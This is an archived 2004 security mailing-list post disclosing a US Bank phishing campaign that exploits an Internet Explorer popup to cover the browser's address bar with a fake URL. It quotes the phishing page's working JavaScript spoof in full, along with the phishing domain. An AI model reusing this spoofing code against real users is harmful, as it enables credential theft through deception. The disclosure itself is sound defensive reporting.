<<< Date Index >>>     <<< Thread Index >>>

IE URL Issue Being Used In Phishing In the Wild [USBank]



One of our developers (Laurentiu Nicula) received an alarming type
of phishing attack today.

received: from UsBank.com ([82.33.97.75]) 

[82.33.97.75 = [ 82-33-97-75.cable.ubr10.azte.blueyonder.co.uk ]

The email looks legitimate enough, but links to:

http://validation-required.info/

The webpage attempts to throw up a little url bar of it's own
which covers IE's url bar. This allows a pretty convincing spoof
job to happen. 

The pop up looks just like IE's url bar, and it is even selectable.

This does not work in Netscape.

It is very similiar to Malware's issues of late. 

He protected the source pretty well, but it reveals some interesting
code which I googled to some Italian guy here (post made in December
of last year):

http://tool.freeonline.it/forum/read.php?f=8&i=361&t=361

Here is the vulnerable code page:

HTTP/1.1 200 OK
Date: Thu, 13 May 2004 22:19:10 GMT
Server: Apache/1.3.29 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2
mod_bwlimited/1.4 PHP/4.3.3 FrontPage/5.0.2.2634 mod_ssl/2.8.16
OpenSSL/0.9.7a
Last-Modified: Wed, 12 May 2004 03:47:59 GMT
ETag: "1da80c8-388-40a19e6f"
Accept-Ranges: bytes
Content-Length: 904
Keep-Alive: timeout=15, max=95
Connection: Keep-Alive
Content-Type: text/html

var vuln_x, vuln_y, vuln_w, vuln_h;
function vuln_calc() {
var root= document[
(document.compatMode=='CSS1Compat') ?
'documentElement' : 'body'
];
vuln_x= window.screenLeft+72;
vuln_y= window.screenTop-20;
vuln_w= root.offsetWidth-520;
vuln_h= 17;
vuln_show();
}

var vuln_win;
function vuln_pop() {
vuln_win= window.createPopup();
vuln_win.document.body.innerHTML= vuln_html;
vuln_win.document.body.style.margin= 0;
vuln_win.document.body.onunload= vuln_pop;
vuln_show();
}

function vuln_show() {
if (vuln_win)
vuln_win.show(vuln_x, vuln_y, vuln_w, vuln_h);
}

var vuln_html= '\x3Cdiv style="height: 100%; line-height: 17px;
font-family: \'Tahoma\', sans-serif; font-size:
8pt;">https://www.usbank.com/secure/-run\x3C/div>'